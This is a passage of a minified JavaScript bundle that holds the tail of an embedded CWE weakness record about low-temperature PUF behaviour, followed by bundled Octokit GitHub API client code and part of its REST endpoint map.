chosen entropy\\n source\'s behavior at exceptionally low temperatures. In the\\n case of DRAM and SRAM, when power is cycled at low\\n temperatures, the device will not contain the bitwise\\n biasing caused by inconsistencies in manufacturing and will\\n instead contain the data from previous boot. Should the PUF\\n primitive be used in a cryptographic construction which\\n does not account for full adversary control of PUF seed\\n data, weakness would arise.","This weakness does not cover \\"Cold Boot Attacks\\"\\n wherein RAM or other external storage is super cooled and\\n read externally by an attacker."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":[{"attr":{"@_Class":"Embedded","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Microcomputer","@_Prevalence":"Undetermined"}}],"Technology":{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Authentication"],"Impact":["Varies by Context","Unexpected State"],"Likelihood":"Low","Note":"Consequences of this weakness are highly contextual."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"The system should account for security primitive behavior when cooled outside standard temperatures."}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1181"}},{"attr":{"@_External_Reference_ID":"REF-1182"}},{"attr":{"@_External_Reference_ID":"REF-1183"}}]},"Content_History":{"Submission":{"Submission_Name":"Paul A. Wortman","Submission_Organization":"Wells Fargo","Submission_Date":"2020-10-23"}}}}');function jq(t,a,e,i,n,r,c){try{var d=t[r](c),T=d.value}catch(k){return void e(k)}d.done?a(T):Promise.resolve(T).then(i,n)}function f2(t){return function(){var a=this,e=arguments;return new Promise(function(i,n){var r=t.apply(a,e);function c(T){jq(r,i,n,c,d,"next",T)}function d(T){jq(r,i,n,c,d,"throw",T)}c(void 0)})}}var jb=de(5486);function mT(){return"object"==typeof navigator&&"userAgent"in navigator?navigator.userAgent:"object"==typeof jb&&"version"in jb?`Node.js/${jb.version.substr(1)} (${jb.platform}; ${jb.arch})`:""}var Mxe=de(2685);function Qq(t){return"[object Object]"===Object.prototype.toString.call(t)}function $q(t){var a,e;return!1!==Qq(t)&&(void 0===(a=t.constructor)||!(!1===Qq(e=a.prototype)||!1===e.hasOwnProperty("isPrototypeOf")))}function Kq(t,a){const e=Object.assign({},t);return Object.keys(a).forEach(i=>{$q(a[i])?i in t?e[i]=Kq(t[i],a[i]):Object.assign(e,{[i]:a[i]}):Object.assign(e,{[i]:a[i]})}),e}function Xq(t){for(const a in t)void 0===t[a]&&delete t[a];return t}function r5(t,a,e){if("string"==typeof a){let[n,r]=a.split(" ");e=Object.assign(r?{method:n,url:r}:{url:n},e)}else e=Object.assign({},a);e.headers=function vxe(t){return t?Object.keys(t).reduce((a,e)=>(a[e.toLowerCase()]=t[e],a),{}):{}}(e.headers),Xq(e),Xq(e.headers);const i=Kq(t||{},e);return t&&t.mediaType.previews.length&&(i.mediaType.previews=t.mediaType.previews.filter(n=>!i.mediaType.previews.includes(n)).concat(i.mediaType.previews)),i.mediaType.previews=i.mediaType.previews.map(n=>n.replace(/-preview/,"")),i}const Txe=/\{[^}]+\}/g;function Exe(t){return t.replace(/^\W+|\W+$/g,"").split(/,/)}function Yq(t,a){return Object.keys(t).filter(e=>!a.includes(e)).reduce((e,i)=>(e[i]=t[i],e),{})}function Jq(t){return t.split(/(%[0-9A-Fa-f]{2})/g).map(function(a){return/%[0-9A-Fa-f]/.test(a)||(a=encodeURI(a).replace(/%5B/g,"[").replace(/%5D/g,"]")),a}).join("")}function p2(t){return encodeURIComponent(t).replace(/[!'()*]/g,function(a){return"%"+a.charCodeAt(0).toString(16).toUpperCase()})}function Qb(t,a,e){return a="+"===t||"#"===t?Jq(a):p2(a),e?p2(e)+"="+a:a}function _2(t){return null!=t}function s5(t){return";"===t||"&"===t||"?"===t}function Ixe(t,a){var e=["+","#",".","/",";","?","&"];return t.replace(/\{([^\{\}]+)\}|([^\{\}]+)/g,function(i,n,r){if(n){let d="";const T=[];if(-1!==e.indexOf(n.charAt(0))&&(d=n.charAt(0),n=n.substr(1)),n.split(/,/g).forEach(function(k){var q=/([^:\*]*)(?::(\d+)|(\*))?/.exec(k);T.push(function xxe(t,a,e,i){var n=t[e],r=[];if(_2(n)&&""!==n)if("string"==typeof n||"number"==typeof n||"boolean"==typeof n)n=n.toString(),i&&"*"!==i&&(n=n.substring(0,parseInt(i,10))),r.push(Qb(a,n,s5(a)?e:""));else if("*"===i)Array.isArray(n)?n.filter(_2).forEach(function(c){r.push(Qb(a,c,s5(a)?e:""))}):Object.keys(n).forEach(function(c){_2(n[c])&&r.push(Qb(a,n[c],c))});else{const c=[];Array.isArray(n)?n.filter(_2).forEach(function(d){c.push(Qb(a,d))}):Object.keys(n).forEach(function(d){_2(n[d])&&(c.push(p2(d)),c.push(Qb(a,n[d].toString())))}),s5(a)?r.push(p2(e)+"="+c.join(",")):0!==c.length&&r.push(c.join(","))}else";"===a?_2(n)&&r.push(p2(e)):""!==n||"&"!==a&&"?"!==a?""===n&&r.push(""):r.push(p2(e)+"=");return r}(a,d,q[1],q[2]||q[3]))}),d&&"+"!==d){var c=",";return"?"===d?c="&":"#"!==d&&(c=d),(0!==T.length?d:"")+T.join(c)}return T.join(",")}return Jq(r)})}function Zq(t){let n,a=t.method.toUpperCase(),e=(t.url||"/").replace(/:([a-z]\w+)/g,"{$1}"),i=Object.assign({},t.headers),r=Yq(t,["method","baseUrl","url","headers","request","mediaType"]);const c=function Dxe(t){const a=t.match(Txe);return a?a.map(Exe).reduce((e,i)=>e.concat(i),[]):[]}(e);e=function wxe(t){return{expand:Ixe.bind(null,t)}}(e).expand(r),/^http/.test(e)||(e=t.baseUrl+e);const T=Yq(r,Object.keys(t).filter(q=>c.includes(q)).concat("baseUrl"));if(!/application\/octet-stream/i.test(i.accept)&&(t.mediaType.format&&(i.accept=i.accept.split(/,/).map(q=>q.replace(/application\/vnd(\.\w+)(\.v3)?(\.\w+)?(\+json)?$/,`application/vnd$1$2.${t.mediaType.format}`)).join(",")),t.mediaType.previews.length)){const q=i.accept.match(/[\w-]+(?=-preview)/g)||[];i.accept=q.concat(t.mediaType.previews).map(Y=>`application/vnd.github.${Y}-preview${t.mediaType.format?`.${t.mediaType.format}`:"+json"}`).join(",")}return["GET","HEAD"].includes(a)?e=function Axe(t,a){const e=/\?/.test(t)?"&":"?",i=Object.keys(a);return 0===i.length?t:t+e+i.map(n=>"q"===n?"q="+a.q.split("+").map(encodeURIComponent).join("+"):`${n}=${encodeURIComponent(a[n])}`).join("&")}(e,T):"data"in T?n=T.data:Object.keys(T).length&&(n=T),!i["content-type"]&&void 0!==n&&(i["content-type"]="application/json; charset=utf-8"),["PATCH","PUT"].includes(a)&&void 0===n&&(n=""),Object.assign({method:a,url:e,headers:i},void 0!==n?{body:n}:null,t.request?{request:t.request}:null)}function Rxe(t,a,e){return Zq(r5(t,a,e))}const kxe=function eG(t,a){const e=r5(t,a),i=Rxe.bind(null,e);return Object.assign(i,{DEFAULTS:e,defaults:eG.bind(null,e),merge:r5.bind(null,e),parse:Zq})}(null,{method:"GET",baseUrl:"https://api.github.com",headers:{accept:"application/vnd.github.v3+json","user-agent":`octokit-endpoint.js/7.0.5 ${mT()}`},mediaType:{format:"",previews:[]}});var Pxe=de(8225),Oxe=de.n(Pxe);class tG extends Error{constructor(a){super(a),Error.captureStackTrace&&Error.captureStackTrace(this,this.constructor),this.name="Deprecation"}}var Nxe=de(9885),iG=de.n(Nxe);const Lxe=iG()(t=>console.warn(t)),zxe=iG()(t=>console.warn(t));class $b extends Error{constructor(a,e,i){let n;super(a),Error.captureStackTrace&&Error.captureStackTrace(this,this.constructor),this.name="HttpError",this.status=e,"headers"in i&&void 0!==i.headers&&(n=i.headers),"response"in i&&(this.response=i.response,n=i.response.headers);const r=Object.assign({},i.request);i.request.headers.authorization&&(r.headers=Object.assign({},i.request.headers,{authorization:i.request.headers.authorization.replace(/ .*$/," [REDACTED]")})),r.url=r.url.replace(/\bclient_secret=\w+/g,"client_secret=[REDACTED]").replace(/\baccess_token=\w+/g,"access_token=[REDACTED]"),this.request=r,Object.defineProperty(this,"code",{get:()=>(Lxe(new tG("[@octokit/request-error] `error.code` is deprecated, use `error.status`.")),e)}),Object.defineProperty(this,"headers",{get:()=>(zxe(new tG("[@octokit/request-error] `error.headers` is deprecated, use `error.response.headers`.")),n||{})})}}function Fxe(t){return t.arrayBuffer()}function aG(t){const a=t.request&&t.request.log?t.request.log:console;($q(t.body)||Array.isArray(t.body))&&(t.body=JSON.stringify(t.body));let i,n,e={};return(t.request&&t.request.fetch||globalThis.fetch||Oxe())(t.url,Object.assign(ZT({method:t.method,body:t.body,headers:t.headers,redirect:t.redirect},t.body&&{duplex:"half"}),t.request)).then(function(){var c=f2(function*(d){n=d.url,i=d.status;for(const T of d.headers)e[T[0]]=T[1];if("deprecation"in e){const T=e.link&&e.link.match(/<([^>]+)>; rel="deprecation"/),k=T&&T.pop();a.warn(`[@octokit/request] "${t.method} ${t.url}" is deprecated. It is scheduled to be removed on ${e.sunset}${k?`. See ${k}`:""}`)}if(204!==i&&205!==i){if("HEAD"===t.method){if(i<400)return;throw new $b(d.statusText,i,{response:{url:n,status:i,headers:e,data:void 0},request:t})}if(304===i)throw new $b("Not modified",i,{response:{url:n,status:i,headers:e,data:yield c5(d)},request:t});if(i>=400){const T=yield c5(d);throw new $b(function Vxe(t){return"string"==typeof t?t:"message"in t?Array.isArray(t.errors)?`${t.message}: ${t.errors.map(JSON.stringify).join(", ")}`:t.message:`Unknown error: ${JSON.stringify(t)}`}(T),i,{response:{url:n,status:i,headers:e,data:T},request:t})}return c5(d)}});return function(d){return c.apply(this,arguments)}}()).then(c=>({status:i,url:n,headers:e,data:c})).catch(c=>{throw c instanceof $b||"AbortError"===c.name?c:new $b(c.message,500,{request:t})})}function c5(t){return l5.apply(this,arguments)}function l5(){return(l5=f2(function*(t){const a=t.headers.get("content-type");return/application\/json/.test(a)?t.json():!a||/^text\/|charset=utf-8$/.test(a)?t.text():Fxe(t)})).apply(this,arguments)}var m5=function d5(t,a){const e=t.defaults(a);return Object.assign(function(n,r){const c=e.merge(n,r);if(!c.request||!c.request.hook)return aG(e.parse(c));const d=(T,k)=>aG(e.parse(e.merge(T,k)));return Object.assign(d,{endpoint:e,defaults:d5.bind(null,e)}),c.request.hook(d,c)},{endpoint:e,defaults:d5.bind(null,e)})}(kxe,{headers:{"user-agent":`octokit-request.js/6.2.5 ${mT()}`}}),Uxe=class extends Error{constructor(t,a,e){super(function Hxe(t){return"Request failed due to following response errors:\n"+t.errors.map(a=>` - ${a.message}`).join("\n")}(e)),this.request=t,this.headers=a,this.response=e,this.name="GraphqlResponseError",this.errors=e.errors,this.data=e.data,Error.captureStackTrace&&Error.captureStackTrace(this,this.constructor)}},qxe=["method","baseUrl","url","headers","request","query","mediaType"],Gxe=["query","method","url"],nG=/\/api\/v3\/?$/;function u5(t,a){const e=t.defaults(a);return Object.assign((n,r)=>function jxe(t,a,e){if(e){if("string"==typeof a&&"query"in e)return Promise.reject(new Error('[@octokit/graphql] "query" cannot be used as variable name'));for(const c in e)if(Gxe.includes(c))return Promise.reject(new Error(`[@octokit/graphql] "${c}" cannot be used as variable name`))}const i="string"==typeof a?Object.assign({query:a},e):a,n=Object.keys(i).reduce((c,d)=>qxe.includes(d)?(c[d]=i[d],c):(c.variables||(c.variables={}),c.variables[d]=i[d],c),{}),r=i.baseUrl||t.endpoint.DEFAULTS.baseUrl;return nG.test(r)&&(n.url=r.replace(nG,"/api/graphql")),t(n).then(c=>{if(c.data.errors){const d={};for(const T of Object.keys(c.headers))d[T]=c.headers[T];throw new Uxe(n,d,c.data)}return c.data.data})}(e,n,r),{defaults:u5.bind(null,e),endpoint:e.endpoint})}u5(m5,{headers:{"user-agent":`octokit-graphql.js/5.0.6 ${mT()}`},method:"POST",url:"/graphql"});const $xe=/^v1\./,Kxe=/^ghs_/,Xxe=/^ghu_/;function Yxe(t){return h5.apply(this,arguments)}function h5(){return(h5=f2(function*(t){const a=3===t.split(/\./).length,e=$xe.test(t)||Kxe.test(t),i=Xxe.test(t);return{type:"token",token:t,tokenType:a?"app":e?"installation":i?"user-to-server":"oauth"}})).apply(this,arguments)}function Jxe(t){return 3===t.split(/\./).length?`bearer ${t}`:`token ${t}`}function Zxe(t,a,e,i){return f5.apply(this,arguments)}function f5(){return(f5=f2(function*(t,a,e,i){const n=a.endpoint.merge(e,i);return n.headers.authorization=Jxe(t),a(n)})).apply(this,arguments)}const ewe=function(a){if(!a)throw new Error("[@octokit/auth-token] No token passed to createTokenAuth");if("string"!=typeof a)throw new Error("[@octokit/auth-token] Token passed to createTokenAuth is not a string");return a=a.replace(/^(token|bearer) +/i,""),Object.assign(Yxe.bind(null,a),{hook:Zxe.bind(null,a)})};var p5=class{static defaults(t){return class extends(this){constructor(...e){const i=e[0]||{};super("function"!=typeof t?Object.assign({},t,i,i.userAgent&&t.userAgent?{userAgent:`${i.userAgent} ${t.userAgent}`}:null):t(i))}}}static plugin(...t){var a;const e=this.plugins;return(a=class extends(this){}).plugins=e.concat(t.filter(n=>!e.includes(n))),a}constructor(t={}){const a=new Mxe.Collection,e={baseUrl:m5.endpoint.DEFAULTS.baseUrl,headers:{},request:Object.assign({},t.request,{hook:a.bind(null,"request")}),mediaType:{previews:[],format:""}};if(e.headers["user-agent"]=[t.userAgent,`octokit-core.js/4.2.1 ${mT()}`].filter(Boolean).join(" "),t.baseUrl&&(e.baseUrl=t.baseUrl),t.previews&&(e.mediaType.previews=t.previews),t.timeZone&&(e.headers["time-zone"]=t.timeZone),this.request=m5.defaults(e),this.graphql=function Qxe(t){return u5(t,{method:"POST",url:"/graphql"})}(this.request).defaults(e),this.log=Object.assign({debug:()=>{},info:()=>{},warn:console.warn.bind(console),error:console.error.bind(console)},t.log),this.hook=a,t.authStrategy){const n=t,{authStrategy:r}=n,c=YZ(n,["authStrategy"]),d=r(Object.assign({request:this.request,log:this.log,octokit:this,octokitOptions:c},t.auth));a.wrap("request",d.hook),this.auth=d}else if(t.auth){const r=ewe(t.auth);a.wrap("request",r.hook),this.auth=r}else this.auth=f2(function*(){return{type:"unauthenticated"}});this.constructor.plugins.forEach(r=>{Object.assign(this,r(this,t))})}};function rG(t){t.hook.wrap("request",(a,e)=>{t.log.debug("request",e);const i=Date.now(),n=t.request.endpoint.parse(e),r=n.url.replace(e.baseUrl,"");return a(e).then(c=>(t.log.info(`${n.method} ${r} - ${c.status} in ${Date.now()-i}ms`),c)).catch(c=>{throw t.log.info(`${n.method} ${r} - ${c.status} in ${Date.now()-i}ms`),c})})}function _5(t,a,e){const i="function"==typeof a?a.endpoint(e):t.request.endpoint(a,e),n="function"==typeof a?a:t.request,r=i.method,c=i.headers;let d=i.url;return{[Symbol.asyncIterator]:()=>({next:()=>f2(function*(){if(!d)return{done:!0};try{const k=function awe(t){if(!t.data)return L7(ZT({},t),{data:[]});if(!("total_count"in t.data)||"url"in t.data)return t;const e=t.data.incomplete_results,i=t.data.repository_selection,n=t.data.total_count;delete t.data.incomplete_results,delete t.data.repository_selection,delete t.data.total_count;const r=Object.keys(t.data)[0];return t.data=t.data[r],void 0!==e&&(t.data.incomplete_results=e),void 0!==i&&(t.data.repository_selection=i),t.data.total_count=n,t}(yield n({method:r,url:d,headers:c}));return d=((k.headers.link||"").match(/<([^>]+)>;\s*rel="next"/)||[])[1],{value:k}}catch(T){if(409!==T.status)throw T;return d="",{value:{status:200,headers:{},data:[]}}}})()})}}function sG(t,a,e,i){return"function"==typeof e&&(i=e,e=void 0),cG(t,[],_5(t,a,e)[Symbol.asyncIterator](),i)}function cG(t,a,e,i){return e.next().then(n=>{if(n.done)return a;let r=!1;return a=a.concat(i?i(n.value,function c(){r=!0}):n.value.data),r?a:cG(t,a,e,i)})}function lG(t){return{paginate:Object.assign(sG.bind(null,t),{iterator:_5.bind(null,t)})}}p5.VERSION="4.2.1",p5.plugins=[],rG.VERSION="1.0.4",Object.assign(sG,{iterator:_5}),lG.VERSION="5.0.1";const dG={actions:{addCustomLabelsToSelfHostedRunnerForOrg:["POST /orgs/{org}/actions/runners/{runner_id}/labels"],addCustomLabelsToSelfHostedRunnerForRepo:["POST /repos/{owner}/{repo}/actions/runners/{runner_id}/labels"],addSelectedRepoToOrgSecret:["PUT /orgs/{org}/actions/secrets/{secret_name}/repositories/{repository_id}"],approveWorkflowRun:["POST /repos/{owner}/{repo}/actions/runs/{run_id}/approve"],cancelWorkflowRun:["POST /repos/{owner}/{repo}/actions/runs/{run_id}/cancel"],createOrUpdateEnvironmentSecret:["PUT /repositories/{repository_id}/environments/{environment_name}/secrets/{secret_name}"],createOrUpdateOrgSecret:["PUT /orgs/{org}/actions/secrets/{secret_name}"],createOrUpdateRepoSecret:["PUT /repos/{owner}/{repo}/actions/secrets/{secret_name}"],createRegistrationTokenForOrg:["POST /orgs/{org}/actions/runners/registration-token"],createRegistrationTokenForRepo:["POST /repos/{owner}/{repo}/actions/runners/registration-token"],createRemoveTokenForOrg:["POST /orgs/{org}/actions/runners/remove-token"],createRemoveTokenForRepo:["POST /repos/{owner}/{repo}/actions/runners/remove-token"],createWorkflowDispatch:["POST /repos/{owner}/{repo}/actions/workflows/{workflow_id}/dispatches"],deleteActionsCacheById:["DELETE /repos/{owner}/{repo}/actions/caches/{cache_id}"],deleteActionsCacheByKey:["DELETE /repos/{owner}/{repo}/actions/caches{?key,ref}"],deleteArtifact:["DELETE /repos/{owner}/{repo}/actions/artifacts/{artifact_id}"],deleteEnvironmentSecret:["DELETE /repositories/{repository_id}/environments/{environment_name}/secrets/{secret_name}"],deleteOrgSecret:["DELETE /orgs/{org}/actions/secrets/{secret_name}"],deleteRepoSecret:["DELETE /repos/{owner}/{repo}/actions/secrets/{secret_name}"],deleteSelfHostedRunnerFromOrg:["DELETE /orgs/{org}/actions/runners/{runner_id}"],deleteSelfHostedRunnerFromRepo:["DELETE /repos/{owner}/{repo}/actions/runners/{runner_id}"],deleteWorkflowRun:["DELETE /repos/{owner}/{repo}/actions/runs/{run_id}"],deleteWorkflowRunLogs:["DELETE /repos/{owner}/{repo}/actions/runs/{run_id}/logs"],disableSelectedRepositoryGithubActionsOrganization:["DELETE /orgs/{org}/actions/permissions/repositories/{repository_id}"],disableWorkflow:["PUT /repos/{owner}/{repo}/actions/workflows/{workflow_id}/disable"],downloadArtifact:["GET /repos/{owner}/{repo}/actions/artifacts/{artifact_id}/{archive_format}"],downloadJobLogsForWorkflowRun:["GET /repos/{owner}/{repo}/actions/jobs/{job_id}/logs"],downloadWorkflowRunAttemptLogs:["GET /repos/{owner}/{repo}/actions/runs/{run_id}/attempts/{attempt_number}/logs"],downloadWorkflowRunLogs:["GET /repos/{owner}/{repo}/actions/runs/{run_id}/logs"],enableSelectedRepositoryGithubActionsOrganization:["PUT /orgs/{org}/actions/permissions/repositories/{repository_id}"],enableWorkflow:["PUT /repos/{owner}/{repo}/actions/workflows/{workflow_id}/enable"],getActionsCacheList:["GET /repos/{owner}/{repo}/actions/caches"],getActionsCacheUsage:["GET /repos/{owner}/{repo}/actions/cache/usage"],getActionsCacheUsageByRepoForOrg:["GET /orgs/{org}/actions/cache/usage-by-repository"],getActionsCacheUsageForEnterprise:["GET /enterprises/{enterprise}/actions/cache/usage"],getActionsCacheUsageForOrg:["GET /orgs/{org}/actions/cache/usage"],getAllowedActionsOrganization:["GET /orgs/{org}/actions/permissions/selected-actions"],getAllowedActionsRepository:["GET /repos/{owner}/{repo}/actions/permissions/selected-actions"],getArtifact:["GET /repos/{owner}/{repo}/actions/artifacts/{artifact_id}"],getEnvironmentPublicKey:["GET /repositories/{repository_id}/environments/{environment_name}/secrets/public-key"],getEnvironmentSecret:["GET /repositories/{repository_id}/environments/{environment_name}/secrets/{secret_name}"],getGithubActionsDefaultWorkflowPermissionsEnterprise:["GET /enterprises/{enterprise}/actions/permissions/workflow"],getGithubActionsDefaultWorkflowPermissionsOrganization:["GET /orgs/{org}/actions/permissions/workflow"],getGithubActionsDefaultWorkflowPermissionsRepository:["GET /repos/{owner}/{repo}/actions/permissions/workflow"],getGithubActionsPermissionsOrganization:["GET /orgs/{org}/actions/permissions"],getGithubActionsPermissionsRepository:["GET /repos/{owner}/{repo}/actions/permissions"],getJobForWorkflowRun:["GET /repos/{owner}/{repo}/actions/jobs/{job_id}"],getOrgPublicKey:["GET /orgs/{org}/actions/secrets/public-key"],getOrgSecret:["GET /orgs/{org}/actions/secrets/{secret_name}"],getPendingDeploymentsForRun:["GET /repos/{owner}/{repo}/actions/runs/{run_id}/pending_deployments"],getRepoPermissions:["GET /repos/{owner}/{repo}/actions/permissions",{},{renamed:["actions","getGithubActionsPermissionsRepository"]}],getRepoPublicKey:["GET /repos/{owner}/{repo}/actions/secrets/public-key"],getRepoSecret:["GET /repos/{owner}/{repo}/actions/secrets/{secret_name}"],getReviewsForRun:["GET /repos/{owner}/{repo}/actions/runs/{run_id}/approvals"],getSelfHostedRunnerForOrg:["GET /orgs/{org}/actions/runners/{runner_id}"],getSelfHostedRunnerForRepo:["GET /repos/{owner}/{repo}/actions/runners/{runner_id}"],getWorkflow:["GET /repos/{owner}/{repo}/actions/workflows/{workflow_id}"],getWorkflowAccessToRepository:["GET /repos/{owner}/{repo}/actions/permissions/access"],getWorkflowRun:["GET /repos/{owner}/{repo}/actions/runs/{run_id}"],getWorkflowRunAttempt:["GET /repos/{owner}/{repo}/actions/runs/{run_id}/attempts/{attempt_number}"],getWorkflowRunUsage:["GET /repos/{owner}/{repo}/actions/runs/{run_id}/timing"],getWorkflowUsage:["GET /repos/{owner}/{repo}/actions/workflows/{workflow_id}/timing"],listArtifactsForRepo:["GET /repos/{owner}/{repo}/actions/artifacts"],listEnvironmentSecrets:["GET /repositories/{repository_id}/environments/{environment_name}/secrets"],listJobsForWorkflowRun:["GET /repos/{owner}/{repo}/actions/runs/{run_id}/jobs"],listJobsForWorkflowRunAttempt:["GET /repos/{owner}/{repo}/actions/runs/{run_id}/attempts/{attempt_number}/jobs"],listLabelsForSelfHostedRunnerForOrg:["GET /orgs/{org}/actions/runners/{runner_id}/labels"],listLabelsForSelfHostedRunnerForRepo:["GET /repos/{owner}/{repo}/actions/runners/{runner_id}/labels"],listOrgSecrets:["GET /orgs/{org}/actions/secrets"],listRepoSecrets:["GET /repos/{owner}/{repo}/actions/secrets"],listRepoWorkflows:["GET /repos/{owner}/{repo}/actions/workflows"],listRunnerApplicationsForOrg:["GET /orgs/{org}/actions/runners/downloads"],listRunnerApplicationsForRepo:["GET /repos/{owner}/{repo}/actions/runners/downloads"],listSelectedReposForOrgSecret:["GET /orgs/{org}/actions/secrets/{secret_name}/repositories"],listSelectedRepositoriesEnabledGithubActionsOrganization:["GET /orgs/{org}/actions/permissions/repositories"],listSelfHostedRunnersForOrg:["GET /orgs/{org}/actions/runners"],listSelfHostedRunnersForRepo:["GET /repos/{owner}/{repo}/actions/runners"],listWorkflowRunArtifacts:["GET /repos/{owner}/{repo}/actions/runs/{run_id}/artifacts"],listWorkflowRuns:["GET /repos/{owner}/{repo}/actions/workflows/{workflow_id}/runs"],listWorkflowRunsForRepo:["GET /repos/{owner}/{repo}/actions/runs"],reRunJobForWorkflowRun:["POST /repos/{owner}/{repo}/actions/jobs/{job_id}/rerun"],reRunWorkflow:["POST /repos/{owner}/{repo}/actions/runs/{run_id}/rerun"],reRunWorkflowFailedJobs:["POST /repos/{owner}/{repo}/actions/runs/{run_id}/rerun-failed-jobs"],removeAllCustomLabelsFromSelfHostedRunnerForOrg:["DELETE /orgs/{org}/actions/runners/{runner_id}/labels"],removeAllCustomLabelsFromSelfHostedRunnerForRepo:["DELETE /repos/{owner}/{repo}/actions/runners/{runner_id}/labels"],removeCustomLabelFromSelfHostedRunnerForOrg:["DELETE /orgs/{org}/actions/runners/{runner_id}/labels/{name}"],removeCustomLabelFromSelfHostedRunnerForRepo:["DELETE /repos/{owner}/{repo}/actions/runners/{runner_id}/labels/{name}"],removeSelectedRepoFromOrgSecret:["DELETE /orgs/{org}/actions/secrets/{secret_name}/repositories/{repository_id}"],reviewPendingDeploymentsForRun:["POST /repos/{owner}/{repo}/actions/runs/{run_id}/pending_deployments"],setAllowedActionsOrganization:["PUT /orgs/{org}/actions/permissions/selected-actions"],setAllowedActionsRepository:["PUT /repos/{owner}/{repo}/actions/permissions/selected-actions"],setCustomLabelsForSelfHostedRunnerForOrg:["PUT /orgs/{org}/actions/runners/{runner_id}/labels"],setCustomLabelsForSelfHostedRunnerForRepo:["PUT /repos/{owner}/{repo}/actions/runners/{runner_id}/labels"],setGithubActionsDefaultWorkflowPermissionsEnterprise:["PUT /enterprises/{enterprise}/actions/permissions/workflow"],setGithubActionsDefaultWorkflowPermissionsOrganization:["PUT /orgs/{org}/actions/permissions/workflow"],setGithubActionsDefaultWorkflowPermissionsRepository:["PUT /repos/{owner}/{repo}/actions/permissions/workflow"],setGithubActionsPermissionsOrganization:["PUT /orgs/{org}/actions/permissions"],setGithubActionsPermissionsRepository:["PUT /repos/{owner}/{repo}/actions/permissions"],setSelectedReposForOrgSecret:["PUT /orgs/{org}/actions/secrets/{secret_name}/repositories"],setSelectedRepositoriesEnabledGithubActionsOrganization:["PUT /orgs/{org}/actions/permissions/repositories"],setWorkflowAccessToRepository:["PUT /repos/{owner}/{repo}/actions/permissions/access"]},activity:{checkRepoIsStarredByAuthenticatedUser:["GET /user/starred/{owner}/{repo}"],deleteRepoSubscription:["DELETE /repos/{owner}/{repo}/subscription"],deleteThreadSubscription:["DELETE /notifications/threads/{thread_id}/subscription"],getFeeds:["GET /feeds"],getRepoSubscription:["GET /repos/{owner}/{repo}/subscription"],getThread:["GET /notifications/threads/{thread_id}"],getThreadSubscriptionForAuthenticatedUser:["GET /notifications/threads/{thread_id}/subscription"],listEventsForAuthenticatedUser:["GET /users/{username}/events"],listNotificationsForAuthenticatedUser:["GET /notifications"],listOrgEventsForAuthenticatedUser:["GET /users/{username}/events/orgs/{org}"],listPublicEvents:["GET /events"],listPublicEventsForRepoNetwork:["GET /networks/{owner}/{repo}/events"],listPublicEventsForUser:["GET /users/{username}/events/public"],listPublicOrgEvents:["GET /orgs/{org}/events"],listReceivedEventsForUser:["GET /users/{username}/received_events"],listReceivedPublicEventsForUser:["GET /users/{username}/received_events/public"],listRepoEvents:["GET /repos/{owner}/{repo}/events"],listRepoNotificationsForAuthenticatedUser:["GET /repos/{owner}/{repo}/notifications"],listReposStarredByAuthenticatedUser:["GET /user/starred"],listReposStarredByUser:["GET /users/{username}/starred"],listReposWatchedByUser:["GET /users/{username}/subscriptions"],listStargazersForRepo:["GET /repos/{owner}/{repo}/stargazers"],listWatchedReposForAuthenticatedUser:["GET /user/subscriptions"],listWatchersForRepo:["GET /repos/{owner}/{repo}/subscribers"],markNotificationsAsRead:["PUT /notifications"],markRepoNotificationsAsRead:["PUT /repos/{owner}/{repo}/notifications"],markThreadAsRead:["PATCH /notifications/threads/{thread_id}"],setRepoSubscription:["PUT /repos/{owner}/{repo}/subscription"],setThreadSubscription:["PUT /notifications/threads/{thread_id}/subscription"],starRepoForAuthenticatedUser:["PUT /user/starred/{owner}/{repo}"],unstarRepoForAuthenticatedUser:["DELETE /user/starred/{owner}/{repo}"]},apps:{addRepoToInstallation:["PUT /user/installations/{installation_id}/repositories/{repository_id}",{},{renamed:["apps","addRepoToInstallationForAuthenticatedUser"]}],addRepoToInstallationForAuthenticatedUser:["PUT /user/installations/{installation_id}/repositories/{repository_id}"],checkToken:["POST /applications/{client_id}/token"],createFromManifest:["POST /app-manifests/{code}/conversions"],createInstallationAccessToken:["POST /app/installations/{installation_id}/access_tokens"],deleteAuthorization:["DELETE /applications/{client_id}/grant"],deleteInstallation:["DELETE /app/installations/{installation_id}"],deleteToken:["DELETE /applications/{client_id}/token"],getAuthenticated:["GET /app"],getBySlug:["GET /apps/{app_slug}"],getInstallation:["GET /app/installations/{installation_id}"],getOrgInstallation:["GET /orgs/{org}/installation"],getRepoInstallation:["GET /repos/{owner}/{repo}/installation"],getSubscriptionPlanForAccount:["GET /marketplace_listing/accounts/{account_id}"],getSubscriptionPlanForAccountStubbed:["GET /marketplace_listing/stubbed/accounts/{account_id}"],getUserInstallation:["GET /users/{username}/installation"],getWebhookConfigForApp:["GET /app/hook/config"],getWebhookDelivery:["GET /app/hook/deliveries/{delivery_id}"],listAccountsForPlan:["GET /marketplace_listing/plans/{plan_id}/accounts"],listAccountsForPlanStubbed:["GET /marketplace_listing/stubbed/plans/{plan_id}/accounts"],listInstallationReposForAuthenticatedUser:["GET /user/installations/{installation_id}/repositories"],listInstallations:["GET /app/installations"],listInstallationsForAuthenticatedUser:["GET /user/installations"],listPlans:["GET /marketplace_listing/plans"],listPlansStubbed:["GET /marketplace_listing/stubbed/plans"],listReposAccessibleToInstallation:["GET /installation/repositories"],listSubscriptionsForAuthenticatedUser:["GET /user/marketplace_purchases"],listSubscriptionsForAuthenticatedUserStubbed:["GET /user/marketplace_purchases/stubbed"],listWebhookDeliveries:["GET /app/hook/deliveries"],redeliverWebhookDelivery:["POST /app/hook/deliveries/{delivery_id}/attempts"],removeRepoFromInstallation:["DELETE /user/installations/{installation_id}/repositories/{repository_id}",{},{renamed:["apps","removeRepoFromInstallationForAuthenticatedUser"]}],removeRepoFromInstallationForAuthenticatedUser:["DELETE 